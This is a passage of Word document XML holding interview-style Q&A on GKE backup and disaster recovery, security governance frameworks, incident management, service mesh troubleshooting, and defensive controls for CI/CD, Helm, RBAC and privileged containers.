        <w:t>Q1842. Scenario: A GKE stateful workload loses data after a bad rollout. How would you restore safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid restoring over the live workload blindly. Freeze writes if needed, identify the last known-good backup or snapshot, restore into an isolated namespace or cluster first, validate data integrity and application startup, then plan cutover or selective data repair. Check whether the workload needs application-consistent backups, not only disk snapshots, and confirm the restored PVCs, StatefulSet identity, service DNS, secrets, and version compatibility before sending traffic back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1843. What should be included in a Kubernetes disaster recovery runbook for GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Include RTO/RPO targets, owners, escalation, backup locations, restore commands or console steps, GitOps/Terraform recovery order, secret recovery, persistent volume restore, database restore, DNS/load balancer cutover, validation checks, rollback criteria, and communication templates. The runbook should specify what is managed by Google, what is rebuilt from IaC, what is restored from backup, and how to prove the application is healthy after recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1844. How would you protect Kubernetes backups from ransomware, accidental deletion, or operator error?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use least-privilege access, separate backup admin roles from cluster admins where possible, store backups in a separate project or protected bucket, enable encryption, retention locks or object versioning where suitable, audit access, and alert on backup deletion or policy changes. Test restore with limited credentials and keep backup metadata outside the failure domain of the primary cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1845. What is the difference between backing up Kubernetes manifests, persistent volumes, and application databases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Manifests capture desired Kubernetes objects such as Deployments, Services, ConfigMaps, RBAC, and policies; persistent volume backups capture disk data attached to Pods; application database backups capture transactionally consistent data from the database engine. A reliable restore often needs all three, but databases usually require application-aware backups or native backup tools to avoid crash-consistency problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Governance and Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1846. Difference between ISO 27001 and NIST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ISO 27001 is certifiable and focuses on building an information security management system. NIST CSF is a flexible framework for improving cybersecurity risk management. ISO is often used for formal certification and governance, while NIST is often used for practical cybersecurity maturity and control mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1847. Give examples of each in cloud infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Preventive: org policies blocking public IPs or public buckets. Detective: alerts for IAM changes, disabled logging, or public exposure. Corrective: automated removal of risky firewall rules, secret rotation, restoring from backup, or rolling back a failed deployment. Together these controls create defense in depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1848. Difference between incident, problem, and risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A risk is a potential future event. An incident is an event that has already affected or threatens service, security, or operations. A problem is the underlying root cause behind one or more incidents. Good risk management tries to prevent risks from becoming incidents and problems from recurring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Kubernetes Services, Service Mesh, AKS and GKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1849. What is the difference between GKE Standard and GKE Autopilot, and how do you choose between them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GKE Autopilot manages nodes and many operational defaults for you, charging mainly by Pod resources and reducing node-management overhead. GKE Standard gives deeper control over node pools, machine types, DaemonSets, networking, upgrades, GPUs, and low-level tuning. Choose Autopilot for simpler, standard workloads where managed operations and secure defaults matter most; choose Standard when you need custom node pools, special hardware, privileged workloads, advanced networking, or tighter cost and scheduling control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1850. Scenario: A GKE workload gets permission denied when accessing Cloud Storage. How would you debug Workload Identity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Verify the Kubernetes ServiceAccount used by the Pod, the mapped Google service account, and the IAM binding that allows the KSA to impersonate the GSA. Then confirm the GSA has the required Cloud Storage role on the right bucket or project. Check Pod annotations, namespace, token projection, metadata server access, and application credentials. Useful commands include kubectl describe pod, kubectl describe serviceaccount, gcloud iam service-accounts get-iam-policy, and gcloud storage buckets get-iam-policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1851. How would you design a production GKE platform for multiple teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate projects or clusters where hard isolation is required, and namespaces where shared-cluster isolation is acceptable. Standardize node pools, labels, taints, quotas, RBAC, NetworkPolicies, Workload Identity, Secret Manager integration, ingress, observability, logging, and GitOps deployment. Add guardrails with policy controllers such as Gatekeeper or Kyverno, provide golden-path templates, define SLOs and runbooks, and make ownership visible through labels, dashboards, and escalation paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1852. How would you compare Kubernetes Ingress, Gateway API, and service mesh ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ingress is the older common abstraction for HTTP routing into a cluster and is simple for standard host/path routing. Gateway API is a newer, more expressive and role-oriented model that separates infrastructure ownership from route ownership and supports richer traffic management. Service mesh ingress, such as Istio ingress gateway, is useful when north-south traffic should share mesh features like mTLS integration, telemetry, advanced routing, and policy. The choice depends on complexity, ownership model, and whether mesh-level traffic controls are needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1853. How would you observe and troubleshoot service-to-service latency in a Kubernetes service mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with golden signals: request rate, error rate, latency, and saturation for both client and server. Use mesh telemetry to identify whether latency is from the application, Envoy sidecar, retries, upstream service, DNS, connection pool, or external dependency. Correlate metrics with distributed traces and logs using trace IDs. Check VirtualService retries and timeouts, DestinationRule connection pools, circuit breaking, mTLS handshake issues, resource limits, and whether sidecar overhead is significant under load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Kubernetes and DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1854. Risks of CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI/CD risks include secret leakage, weak branch protection, untrusted dependencies, compromised runners, excessive deployment permissions, missing approvals, lack of artifact integrity, and poor rollback. Strong controls include least privilege, signed artifacts, approvals, scanning, protected branches, and audit logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1855. Risks of GitHub Actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include exposed secrets, unsafe pull request workflows, third-party action compromise, broad tokens, self-hosted runner abuse, and unpinned action versions. Controls include least-privilege tokens, environment approvals, pinned SHAs, secret restrictions, branch protection, OIDC federation, and runner isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1856. Risks of Helm charts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Helm chart risks include insecure defaults, excessive privileges, hardcoded secrets, mutable image tags, unsafe templates, and unreviewed third-party charts. I mitigate these with chart review, values validation, policy checks, pinned versions, signed charts where possible, and environment-specific approvals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1857. Kubernetes RBAC risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RBAC risks include broad ClusterRoleBindings, default service account misuse, wildcard permissions, privilege escalation through pods or secrets, and unclear ownership. I reduce this with namespace-scoped roles, least privilege, access reviews, audit logs, and separating human, workload, and CI/CD permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1858. Risks of privileged containers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Privileged containers can access host resources and bypass container isolation, increasing the risk of node compromise. They should be blocked by default using Pod Security Admission, Gatekeeper, or Kyverno, with exceptions only for justified platform components and strong monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>-------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Monitoring and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1859. Difference between KRIs and KPIs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: KPIs measure performance, while KRIs measure risk exposure. For example, deployment frequency is a KPI; change failure rate or emergency change percentage can be a KRI. Both are useful, but KRIs are more focused on early warning and risk posture.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